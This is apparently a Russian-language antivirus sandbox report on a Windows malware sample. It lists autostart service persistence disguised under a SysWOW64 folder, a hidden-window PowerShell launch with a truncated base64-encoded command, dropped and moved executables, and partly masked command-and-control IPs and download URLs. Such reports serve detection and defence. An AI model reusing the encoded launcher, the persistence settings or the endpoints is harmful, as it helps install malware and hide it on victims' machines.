Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\pautoenr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pautoenr] 'ImagePath' = '"%WINDIR%\SysWOW64\vccorlib110\pautoenr.exe"'
Создает следующие сервисы
- 'pautoenr' "%WINDIR%\SysWOW64\vccorlib110\pautoenr.exe"
- 'pautoenr' %WINDIR%\SysWOW64\vccorlib110\pautoenr.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\vccorlib110\pautoenr.exe
Перемещает следующие файлы
- %HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe в %WINDIR%\syswow64\vccorlib110\pautoenr.exe
Сетевая активность
Подключается к
- '12.##3.208.58':80
- '45.#3.35.74':8080
- '87.##6.253.248':8080
TCP
Запросы HTTP GET
- http://ac#####sinstitute.com/wp-includes/iLIsBcutT/
Запросы HTTP POST
- http://12.##3.208.58/wHyQ7tbJL2iezHJwY/kW7OTe/
- http://87.###.253.248:8080/4BNv8p/X4fGC/WcxAw0G08Jwz/ via 87.##6.253.248
UDP
- DNS ASK ac#####sinstitute.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe'
- '%WINDIR%\syswow64\vccorlib110\pautoenr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA...' (со скрытым окном)
